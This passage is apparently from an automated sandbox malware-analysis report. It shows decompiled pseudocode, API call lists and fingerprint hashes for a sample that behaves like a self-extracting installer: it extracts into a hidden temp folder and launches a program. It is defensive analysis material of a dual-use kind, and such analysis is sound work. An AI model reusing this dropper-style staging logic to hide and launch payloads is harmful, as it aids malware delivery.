                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A44049
                                                                                                                                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00A4405C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A4409C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A440A8
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00A440DC
                                                                                                                                                                                                                                            • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 00A440E9
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3183975587-0
                                                                                                                                                                                                                                            • Opcode ID: 3071cdfcc8b0afd7b35b35f2ebc27fb720f829e795462021c54409f521230b95
                                                                                                                                                                                                                                            • Instruction ID: 4c1031b9637a94940b3e37a74187e2c95eb4e102514ca58a340e3639a635da5e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3071cdfcc8b0afd7b35b35f2ebc27fb720f829e795462021c54409f521230b95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5131A23D680218ABEB20DBA9DC49FAB777CEBDA741F1002A9F505D2161C7354D86CB11
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 70%
                                                                                                                                                                                                                                            			E00A42BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                                                                                            				long _t4;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t7;
                                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                                                                                                                                                            				intOrPtr* _t17;
                                                                                                                                                                                                                                            				signed char _t19;
                                                                                                                                                                                                                                            				intOrPtr* _t21;
                                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                                            				intOrPtr _t32;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t4 = GetVersion();
                                                                                                                                                                                                                                            				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                                                            					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                                                            					if(_t12 != 0) {
                                                                                                                                                                                                                                            						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t17 = _t21;
                                                                                                                                                                                                                                            							 *0xa4a288(0, 1, 0, 0);
                                                                                                                                                                                                                                            							 *_t21();
                                                                                                                                                                                                                                            							_t29 = _t24 - _t24;
                                                                                                                                                                                                                                            							if(_t24 != _t24) {
                                                                                                                                                                                                                                            								_t17 = 4;
                                                                                                                                                                                                                                            								asm("int 0x29");
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t20 = _a12;
                                                                                                                                                                                                                                            				_t18 = _a4;
                                                                                                                                                                                                                                            				 *0xa49124 = 0;
                                                                                                                                                                                                                                            				if(E00A42CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                                                            					_t9 = E00A42F1D(_t18, _t20); // executed
                                                                                                                                                                                                                                            					_t22 = _t9; // executed
                                                                                                                                                                                                                                            					E00A452B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                                                            					if(_t22 != 0) {
                                                                                                                                                                                                                                            						_t32 =  *0xa48a3a; // 0x0
                                                                                                                                                                                                                                            						if(_t32 == 0) {
                                                                                                                                                                                                                                            							_t19 =  *0xa49a2c; // 0x0
                                                                                                                                                                                                                                            							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                                                            								E00A41F90(_t19, _t21, _t22);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t6 =  *0xa48588; // 0x0
                                                                                                                                                                                                                                            				if(_t6 != 0) {
                                                                                                                                                                                                                                            					CloseHandle(_t6);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t7 =  *0xa49124; // 0x80070002
                                                                                                                                                                                                                                            				return _t7;
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a42c03
                                                                                                                                                                                                                                            0x00a42c0d
                                                                                                                                                                                                                                            0x00a42c18
                                                                                                                                                                                                                                            0x00a42c20
                                                                                                                                                                                                                                            0x00a42c2e
                                                                                                                                                                                                                                            0x00a42c32
                                                                                                                                                                                                                                            0x00a42c36
                                                                                                                                                                                                                                            0x00a42c3d
                                                                                                                                                                                                                                            0x00a42c43
                                                                                                                                                                                                                                            0x00a42c45
                                                                                                                                                                                                                                            0x00a42c47
                                                                                                                                                                                                                                            0x00a42c49
                                                                                                                                                                                                                                            0x00a42c4e
                                                                                                                                                                                                                                            0x00a42c4e
                                                                                                                                                                                                                                            0x00a42c47
                                                                                                                                                                                                                                            0x00a42c32
                                                                                                                                                                                                                                            0x00a42c20
                                                                                                                                                                                                                                            0x00a42c50
                                                                                                                                                                                                                                            0x00a42c54
                                                                                                                                                                                                                                            0x00a42c57
                                                                                                                                                                                                                                            0x00a42c64
                                                                                                                                                                                                                                            0x00a42c66
                                                                                                                                                                                                                                            0x00a42c6b
                                                                                                                                                                                                                                            0x00a42c6d
                                                                                                                                                                                                                                            0x00a42c74
                                                                                                                                                                                                                                            0x00a42c76
                                                                                                                                                                                                                                            0x00a42c7c
                                                                                                                                                                                                                                            0x00a42c7e
                                                                                                                                                                                                                                            0x00a42c87
                                                                                                                                                                                                                                            0x00a42c89
                                                                                                                                                                                                                                            0x00a42c89
                                                                                                                                                                                                                                            0x00a42c87
                                                                                                                                                                                                                                            0x00a42c7c
                                                                                                                                                                                                                                            0x00a42c74
                                                                                                                                                                                                                                            0x00a42c8e
                                                                                                                                                                                                                                            0x00a42c95
                                                                                                                                                                                                                                            0x00a42c98
                                                                                                                                                                                                                                            0x00a42c98
                                                                                                                                                                                                                                            0x00a42c9e
                                                                                                                                                                                                                                            0x00a42ca7

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetVersion.KERNEL32(?,00000002,00000000,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C03
                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C18
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00A42C28
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00A46BB0,00A40000,00000000,00000002,0000000A), ref: 00A42C98
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                            • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                            • Opcode ID: 0ff4edb13b7074082a13512b24292d3142f477ad55d280a5557bf5efba7b247c
                                                                                                                                                                                                                                            • Instruction ID: 0222f3e29a21ca0b81d8d6c48eabfd564e59ec18d6432b99543f58f6a56a0a2b
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0ff4edb13b7074082a13512b24292d3142f477ad55d280a5557bf5efba7b247c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D11E17D640315ABD720AFF9ADC8B6F3769ABC9392B840125F901E3251DA72DC83C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A46F40() {
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				SetUnhandledExceptionFilter(E00A46EF0); // executed
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                            0x00a46f45
                                                                                                                                                                                                                                            0x00a46f4d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00A46F45
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                                                                                                                            • Opcode ID: f6bb4c687c496ccbbcb02a22f2906aa0d37ed78c7e2c7cd8c3a9d6c86c22fda4
                                                                                                                                                                                                                                            • Instruction ID: 2c9e60953de671c4f60bd32b29c4af7513a606b9887aac8467c76aa6838989b1
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6bb4c687c496ccbbcb02a22f2906aa0d37ed78c7e2c7cd8c3a9d6c86c22fda4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8B90026C2911406796145BB49D1A41575D16ADF702B815960A111C4494DB6140415513
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 232 a455a0-a455d9 call a4468f LocalAlloc 235 a455fd-a4560c call a4468f 232->235 236 a455db-a455f1 call a444b9 call a46285 232->236 242 a45632-a45643 lstrcmpA 235->242 243 a4560e-a45630 call a444b9 LocalFree 235->243 248 a455f6-a455f8 236->248 246 a45645 242->246 247 a4564b-a45659 LocalFree 242->247 243->248 246->247 250 a45696-a4569c 247->250 251 a4565b-a4565d 247->251 252 a458b7-a458c7 call a46ce0 248->252 253 a456a2-a456a8 250->253 254 a4589f-a458b5 call a46517 250->254 255 a4565f-a45667 251->255 256 a45669 251->256 253->254 260 a456ae-a456c1 GetTempPathA 253->260 254->252 255->256 257 a4566b-a4567a call a45467 255->257 256->257 269 a45680-a45691 call a444b9 257->269 270 a4589b-a4589d 257->270 264 a456f3-a45711 call a41781 260->264 265 a456c3-a456c9 call a45467 260->265 274 a45717-a45729 GetDriveTypeA 264->274 275 a4586c-a45890 GetWindowsDirectoryA call a4597d 264->275 272 a456ce-a456d0 265->272 269->248 270->252 272->270 276 a456d6-a456df call a42630 272->276 278 a45730-a45740 GetFileAttributesA 274->278 279 a4572b-a4572e 274->279 275->264 289 a45896 275->289 276->264 290 a456e1-a456ed call a45467 276->290 282 a45742-a45745 278->282 283 a4577e-a4578f call a4597d 278->283 279->278 279->282 287 a45747-a4574f 282->287 288 a4576b 282->288 297 a45791-a4579e call a42630 283->297 298 a457b2-a457bf call a42630 283->298 291 a45771-a45779 287->291 294 a45751-a45753 287->294 288->291 289->270 290->264 290->270 295 a45864-a45866 291->295 294->291 299 a45755-a45762 call a46952 294->299 295->274 295->275 297->288 306 a457a0-a457b0 call a4597d 297->306 307 a457c1-a457cd GetWindowsDirectoryA 298->307 308 a457d3-a457f8 call a4658a GetFileAttributesA 298->308 299->288 309 a45764-a45769 299->309 306->288 306->298 307->308 314 a4580a 308->314 315 a457fa-a45808 CreateDirectoryA 308->315 309->283 309->288 316 a4580d-a4580f 314->316 315->316 317 a45827-a4585c SetFileAttributesA call a41781 call a45467 316->317 318 a45811-a45825 316->318 317->270 323 a4585e 317->323 318->295 323->295
                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A455A0(void* __eflags) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v265;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                                            				int _t32;
                                                                                                                                                                                                                                            				int _t33;
                                                                                                                                                                                                                                            				int _t35;
                                                                                                                                                                                                                                            				signed int _t36;
                                                                                                                                                                                                                                            				signed int _t38;
                                                                                                                                                                                                                                            				int _t40;
                                                                                                                                                                                                                                            				int _t44;
                                                                                                                                                                                                                                            				long _t48;
                                                                                                                                                                                                                                            				int _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            				int _t54;
                                                                                                                                                                                                                                            				int _t59;
                                                                                                                                                                                                                                            				char _t60;
                                                                                                                                                                                                                                            				int _t65;
                                                                                                                                                                                                                                            				char _t66;
                                                                                                                                                                                                                                            				int _t67;
                                                                                                                                                                                                                                            				int _t68;
                                                                                                                                                                                                                                            				int _t69;
                                                                                                                                                                                                                                            				int _t70;
                                                                                                                                                                                                                                            				int _t71;
                                                                                                                                                                                                                                            				struct _SECURITY_ATTRIBUTES* _t72;
                                                                                                                                                                                                                                            				int _t73;
                                                                                                                                                                                                                                            				CHAR* _t82;
                                                                                                                                                                                                                                            				CHAR* _t88;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				signed int _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t28 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t28 ^ _t110;
                                                                                                                                                                                                                                            				_t2 = E00A4468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                            				_t109 = LocalAlloc(0x40, _t2);
                                                                                                                                                                                                                                            				if(_t109 != 0) {
                                                                                                                                                                                                                                            					_t82 = "RUNPROGRAM";
                                                                                                                                                                                                                                            					_t32 = E00A4468F(_t82, _t109, 1);
                                                                                                                                                                                                                                            					__eflags = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						_t33 = lstrcmpA(_t109, "<None>");
                                                                                                                                                                                                                                            						__eflags = _t33;
                                                                                                                                                                                                                                            						if(_t33 == 0) {
                                                                                                                                                                                                                                            							 *0xa49a30 = 1;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						_t35 =  *0xa48b3e; // 0x0
                                                                                                                                                                                                                                            						__eflags = _t35;
                                                                                                                                                                                                                                            						if(_t35 == 0) {
                                                                                                                                                                                                                                            							__eflags =  *0xa48a24; // 0x0
                                                                                                                                                                                                                                            							if(__eflags != 0) {
                                                                                                                                                                                                                                            								L46:
                                                                                                                                                                                                                                            								_t101 = 0x7d2;
                                                                                                                                                                                                                                            								_t36 = E00A46517(_t82, 0x7d2, 0, E00A43210, 0, 0);
                                                                                                                                                                                                                                            								asm("sbb eax, eax");
                                                                                                                                                                                                                                            								_t38 =  ~( ~_t36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa49a30; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L46;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t109 = 0xa491e4;
                                                                                                                                                                                                                                            									_t40 = GetTempPathA(0x104, 0xa491e4);
                                                                                                                                                                                                                                            									__eflags = _t40;
                                                                                                                                                                                                                                            									if(_t40 == 0) {
                                                                                                                                                                                                                                            										L19:
                                                                                                                                                                                                                                            										_push(_t82);
                                                                                                                                                                                                                                            										E00A41781( &_v268, 0x104, _t82, "A:\\");
                                                                                                                                                                                                                                            										__eflags = _v268 - 0x5a;
                                                                                                                                                                                                                                            										if(_v268 <= 0x5a) {
                                                                                                                                                                                                                                            											do {
                                                                                                                                                                                                                                            												_t109 = GetDriveTypeA( &_v268);
                                                                                                                                                                                                                                            												__eflags = _t109 - 6;
                                                                                                                                                                                                                                            												if(_t109 == 6) {
                                                                                                                                                                                                                                            													L22:
                                                                                                                                                                                                                                            													_t48 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            													__eflags = _t48 - 0xffffffff;
                                                                                                                                                                                                                                            													if(_t48 != 0xffffffff) {
                                                                                                                                                                                                                                            														goto L30;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L23;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													__eflags = _t109 - 3;
                                                                                                                                                                                                                                            													if(_t109 != 3) {
                                                                                                                                                                                                                                            														L23:
                                                                                                                                                                                                                                            														__eflags = _t109 - 2;
                                                                                                                                                                                                                                            														if(_t109 != 2) {
                                                                                                                                                                                                                                            															L28:
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															goto L29;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t66 = _v268;
                                                                                                                                                                                                                                            															__eflags = _t66 - 0x41;
                                                                                                                                                                                                                                            															if(_t66 == 0x41) {
                                                                                                                                                                                                                                            																L29:
                                                                                                                                                                                                                                            																_t60 = _t66 + 1;
                                                                                                                                                                                                                                            																_v268 = _t60;
                                                                                                                                                                                                                                            																goto L42;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																__eflags = _t66 - 0x42;
                                                                                                                                                                                                                                            																if(_t66 == 0x42) {
                                                                                                                                                                                                                                            																	goto L29;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t68 = E00A46952( &_v268);
                                                                                                                                                                                                                                            																	__eflags = _t68;
                                                                                                                                                                                                                                            																	if(_t68 == 0) {
                                                                                                                                                                                                                                            																		goto L28;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		__eflags = _t68 - 0x19000;
                                                                                                                                                                                                                                            																		if(_t68 >= 0x19000) {
                                                                                                                                                                                                                                            																			L30:
                                                                                                                                                                                                                                            																			_push(0);
                                                                                                                                                                                                                                            																			_t103 = 3;
                                                                                                                                                                                                                                            																			_t49 = E00A4597D( &_v268, _t103, 1);
                                                                                                                                                                                                                                            																			__eflags = _t49;
                                                                                                                                                                                                                                            																			if(_t49 != 0) {
                                                                                                                                                                                                                                            																				L33:
                                                                                                                                                                                                                                            																				_t50 = E00A42630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t50;
                                                                                                                                                                                                                                            																				if(_t50 != 0) {
                                                                                                                                                                                                                                            																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t88 =  &_v268;
                                                                                                                                                                                                                                            																				E00A4658A(_t88, 0x104, "msdownld.tmp");
                                                                                                                                                                                                                                            																				_t53 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            																				__eflags = _t53 - 0xffffffff;
                                                                                                                                                                                                                                            																				if(_t53 != 0xffffffff) {
                                                                                                                                                                                                                                            																					_t54 = _t53 & 0x00000010;
                                                                                                                                                                                                                                            																					__eflags = _t54;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				__eflags = _t54;
                                                                                                                                                                                                                                            																				if(_t54 != 0) {
                                                                                                                                                                                                                                            																					SetFileAttributesA( &_v268, 2);
                                                                                                                                                                                                                                            																					_push(_t88);
                                                                                                                                                                                                                                            																					_t109 = 0xa491e4;
                                                                                                                                                                                                                                            																					E00A41781(0xa491e4, 0x104, _t88,  &_v268);
                                                                                                                                                                                                                                            																					_t101 = 1;
                                                                                                                                                                                                                                            																					_t59 = E00A45467(0xa491e4, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t59;
                                                                                                                                                                                                                                            																					if(_t59 != 0) {
                                                                                                                                                                                                                                            																						goto L45;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t60 = _v268;
                                                                                                                                                                                                                                            																						goto L42;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                            																					_v265 = 0;
                                                                                                                                                                                                                                            																					_v268 = _t60;
                                                                                                                                                                                                                                            																					goto L42;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				_t65 = E00A42630(0,  &_v268, 1);
                                                                                                                                                                                                                                            																				__eflags = _t65;
                                                                                                                                                                                                                                            																				if(_t65 != 0) {
                                                                                                                                                                                                                                            																					goto L28;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t67 = E00A4597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                            																					__eflags = _t67;
                                                                                                                                                                                                                                            																					if(_t67 == 0) {
                                                                                                                                                                                                                                            																						goto L28;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						goto L33;
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			goto L28;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														goto L22;
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L47;
                                                                                                                                                                                                                                            												L42:
                                                                                                                                                                                                                                            												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                            											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										goto L43;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t101 = 1;
                                                                                                                                                                                                                                            										_t69 = E00A45467(0xa491e4, 1, 3); // executed
                                                                                                                                                                                                                                            										__eflags = _t69;
                                                                                                                                                                                                                                            										if(_t69 != 0) {
                                                                                                                                                                                                                                            											goto L45;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t82 = 0xa491e4;
                                                                                                                                                                                                                                            											_t70 = E00A42630(0, 0xa491e4, 1);
                                                                                                                                                                                                                                            											__eflags = _t70;
                                                                                                                                                                                                                                            											if(_t70 != 0) {
                                                                                                                                                                                                                                            												goto L19;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t101 = 1;
                                                                                                                                                                                                                                            												_t82 = 0xa491e4;
                                                                                                                                                                                                                                            												_t71 = E00A45467(0xa491e4, 1, 1);
                                                                                                                                                                                                                                            												__eflags = _t71;
                                                                                                                                                                                                                                            												if(_t71 != 0) {
                                                                                                                                                                                                                                            													goto L45;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													do {
                                                                                                                                                                                                                                            														goto L19;
                                                                                                                                                                                                                                            														L43:
                                                                                                                                                                                                                                            														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                            														_push(4);
                                                                                                                                                                                                                                            														_t101 = 3;
                                                                                                                                                                                                                                            														_t82 =  &_v268;
                                                                                                                                                                                                                                            														_t44 = E00A4597D(_t82, _t101, 1);
                                                                                                                                                                                                                                            														__eflags = _t44;
                                                                                                                                                                                                                                            													} while (_t44 != 0);
                                                                                                                                                                                                                                            													goto L2;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                            							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                                            								_t72 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								__eflags =  *0xa48b3f - _t35; // 0x0
                                                                                                                                                                                                                                            								_t72 = 0;
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									goto L10;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t101 = 0;
                                                                                                                                                                                                                                            							_t73 = E00A45467(0xa48b3e, 0, _t72);
                                                                                                                                                                                                                                            							__eflags = _t73;
                                                                                                                                                                                                                                            							if(_t73 != 0) {
                                                                                                                                                                                                                                            								L45:
                                                                                                                                                                                                                                            								_t38 = 1;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t101 = 0x4be;
                                                                                                                                                                                                                                            								E00A444B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            								goto L2;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t101 = 0x4b1;
                                                                                                                                                                                                                                            						E00A444B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            						LocalFree(_t109);
                                                                                                                                                                                                                                            						 *0xa49124 = 0x80070714;
                                                                                                                                                                                                                                            						goto L2;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t101 = 0x4b5;
                                                                                                                                                                                                                                            					E00A444B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					 *0xa49124 = E00A46285();
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					_t38 = 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L47:
                                                                                                                                                                                                                                            				return E00A46CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                            			}





































                                                                                                                                                                                                                                            0x00a455ab
                                                                                                                                                                                                                                            0x00a455b2
                                                                                                                                                                                                                                            0x00a455c9
                                                                                                                                                                                                                                            0x00a455d5
                                                                                                                                                                                                                                            0x00a455d9
                                                                                                                                                                                                                                            0x00a45600
                                                                                                                                                                                                                                            0x00a45605
                                                                                                                                                                                                                                            0x00a4560a
                                                                                                                                                                                                                                            0x00a4560c
                                                                                                                                                                                                                                            0x00a45638
                                                                                                                                                                                                                                            0x00a45641
                                                                                                                                                                                                                                            0x00a45643
                                                                                                                                                                                                                                            0x00a45645
                                                                                                                                                                                                                                            0x00a45645
                                                                                                                                                                                                                                            0x00a4564c
                                                                                                                                                                                                                                            0x00a45652
                                                                                                                                                                                                                                            0x00a45657
                                                                                                                                                                                                                                            0x00a45659
                                                                                                                                                                                                                                            0x00a45696
                                                                                                                                                                                                                                            0x00a4569c
                                                                                                                                                                                                                                            0x00a4589f
